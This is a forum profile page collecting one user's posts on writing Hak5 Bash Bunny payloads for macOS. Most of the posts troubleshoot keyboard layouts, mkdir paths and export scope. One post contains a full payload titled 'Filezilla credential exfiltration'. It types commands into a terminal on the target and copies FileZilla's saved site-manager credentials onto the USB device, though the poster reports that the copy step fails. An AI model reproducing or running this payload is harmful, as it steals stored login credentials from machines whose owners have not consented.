quentin_lamamy
-
Posts
122 -
Joined
-
Last visited
-
Days Won
2
Posts posted by quentin_lamamy
-
-
I am on OSX and i need to create a new keyboard layout for the mac keyboard. Does someone know how to create it ?
-
issue solved, i have to create a new json that match the osx keyboard layout (i don't know how but i need), until i learn how to create a new keyboard layout i just change the system keyboard layout to a classic FR PC Azerty
-
Don't work anymore , Whaaaaaaat !
. Welllll, does something change in the new firmware ???
DUCKY_LANG fr [...] Q STRING printf '\e[2t' Q ENTER
Result
printf ¡e{2t -
21 hours ago, Dave-ee Jones said:
Okay, that's good news. You might notice you can do other things like for loops, while loops, switches, etc. Normal Bash programming stuff :P
Yes all this classic command will work, i try all the "uncommon" command and try them to help the future BB noob like me
Next unix command test : export
export FOO="BAR" Q STRING $FOO # Will print, as expected BAR in the current focused window export PS1="bashbunny>" # Will do nothing
I have little idea on why it don't change my terminal prompt, it may be a kind of scope issue. Something like the var is set for the actual running script on the BB and not for the current opened terminal.
I use to success to make this work with Q STRING en Q ENTER, but now it sucks with some encoding issue# Print this command in terminal in order to be in the "good scope" Q STRING "export PS1='bashbunny >'" Q ENTER
but the unexpected result isexport PS1-'bashbunny #'encoding PB solve with a new OSX keyboard layout
-
Yes, i know it sucks to do this way, now i use /root/udisk.
At the moment i have tested 2 unix command that works, mkdir and source
-
I will be happy to help you, but please use one topic for one subject, it will help people in the future.
-
If the character is on your keyboard layout you have to set the keyboard layout in your script
DUCKY_LANG frand add the right json according to your keyboard layout in the language folder
If the character is not on your keyboard i think it's possible to use the ascii or the hexa code, but you have to wait for a more skilled BB user to have this info.
-
i think there is one, but i don't have the answer. Please wait for someone else who have more hardware BB skill
-
Hi,
If i good understand you need to use the Ñ character ?
-
after the solid green (means that bb is rebooting) you have to wait for a blue blinking Here is the procedure.
It seems that you unplug it during the reboot, i think you brick your BB. I'm still a kind of BB noob and have no more info for you.
Wait for a BB god to have more info
-
What was the process step by step you use to upgrade ?
In which mode are you when you plug your BB ? Arming ?
-
It seems that you can restore your BB https://forums.hak5.org/index.php?/topic/40293-i-may-killed-it/#comment-287106, never test
-
Just try and yes tadaa i have my folder, but in my case it don't work ?
#!/bin/bash ############################################################################### # _____ _____ _____ _____ _____ _____ _____ _____ __ __ # # (\___/) | __ || _ || __|| | | | __ || | || | || | || | | # # (='.'=) | __ -|| ||__ || | | __ -|| | || | | || | | ||_ _| # # (")_(") |_____||__|__||_____||__|__| |_____||_____||_|___||_|___| |_| # # Bash Bunny by Hak5 USB Attack/Automation Platform # # # ############################################################################### # # # Title: Filezilla credential exfiltration # # Author: Quentin Lamamy <contact@quentin-lamamy.fr> # # Description Exfiltrate filezilla credential # # Version: 1.0 # # Platform OSX # # # ############################################################################### ##################### # Setup the payload # ##################### LED SETUP rootDir=/Volumes/BashBunny lootDir=$rootDir/loot/exfiltration/filezilla DUCKY_LANG fr GET SWITCH_POSITION ATTACKMODE HID STORAGE ##################### # Attack the target # ##################### LED ATTACK Q CTRL SPACE Q STRING terminal Q ENTER Q STRING source $rootDir/payloads/$SWITCH_POSITION/shell.sh Q ENTER Q STRING shell.init Q ENTER Q STRING mkdir -p $lootDir Q ENTER Q STRING source $rootDir/payloads/$SWITCH_POSITION/filezillaExfiltration.sh; Q ENTER Q STRING filezilla.exfiltration $lootDir Q ENTER #Q STRING clear #Q ENTER QUACK STRING source $rootDir/payloads/$SWITCH_POSITION/footer.sh QUACK ENTER # Close terminal #QUACK STRING killall Terminal #QUACK ENTER LED FINISH ################################################################################# # (\___/) Find further documentation, repository of payloads, (\___/) # # (='.'=) tutorial videos and community support forums at (='.'=) # # (")_(") bashbunny.com. (C) Hak5 LLC (")_(") # #################################################################################
cp: /Volumes/BashBunny/loot/exfiltration/filezilla/quentin_sitemanager.xml: No such file or directoryIt's not the better way to do QUACK mkdir ..... and QUACK ENTER, but it should work no ?
-
Yes here is my complete payload hearder
LED SETUP rootDir=/Volumes/BashBunny lootDir=$rootDir/loot/exfiltration/ DUCKY_LANG fr GET SWITCH_POSITION ATTACKMODE HID STORAGE -
Here is the result of some test
TEST 1 : Print the command in shell and press enter
rootDir=/Volumes/BashBunny lootDir=$rootDir/loot/exfiltration/ [...] Q STRING mkdir -p $lootDir Q ENTER
The result : No folder creation and this result in the console
bashbunny> mkdir §p /Volumes/BashBunny/loot/exfiltration/ mkdir: §p: File existsWhy this error ? Don't know because the file doesn't exist,
And why my mkdir -p become mkdir: §p ?
-
well... thks but what is the link with the question ? ^^
-
20 minutes ago, Dave-ee Jones said:
Where are you posting the Ducky script? In your SSH/Serial shell for the Bunny or..?
it's just in my switch1 folder like any other payload (not in serial console) And i test this weird path because i see it in this payload (when i don't have enough documentation or data, i try to learn from the existing script). But it seems that it's not the good way to create a folder (before moving file inside during exfiltration)
-
Ok, hoist the white flag xD
I just try try this command
mkdir -p /root/udisk/loot/exfiltration
nothing, no folder, a total void ^^
but if i use this command
Q STRING mkdir -p /Volumes/BashBunny/loot/exfiltration Q ENTER
it work's \o/
for me it's the same, i just want to understand where is my mistake.
Thks
-
Thks for the tutorial... and the respect..... I'm not aware of the internal software and hardware of the BB.
Just tell me that bb is a linux computer in a USB key, it's enough , i don't need help to know the command list available on unix, and i don't need your disdain.
-
10 minutes ago, Dave-ee Jones said:
Yes, many *Unix commands are supported by the Bash Bunny because it is a Linux box.
mkdir
chmod
mv
cd
man
rmdir
rmThere are lots..
There is a list somewhere ? I can't find this information on the wiki
-
but it's a nix command ? It's a custom function interpreted by the BB to create folder only on the BB ? If yes, it's not a good choice to keep the same function name
-
For information i resolve the issue with a printf inside a function.Well... no it don't work anymore, and forget to enable the versioning
-
Hi there,
I have a little question, i love my bash bunny, create a lot of payloads (i will post them when really finished), but still have some question.
Actually for all my payload i open a terminal, minimize it and do my stuff. When i look at this kind of payload , on line 24 there is a unix command "mkdir". So, it's possible to use unix command without a terminal ?
Reminder for people who read this topic, working unix command in payload :
mkdir source export -
I try on another target computer and still don't work.. May be a bug with the bash bunny script ?
. Welllll, does something change in the new firmware ???
Bash Bunny Switch issue
in Bash Bunny
Posted
well, the mechanic switch is OK, you can use the 3 position ?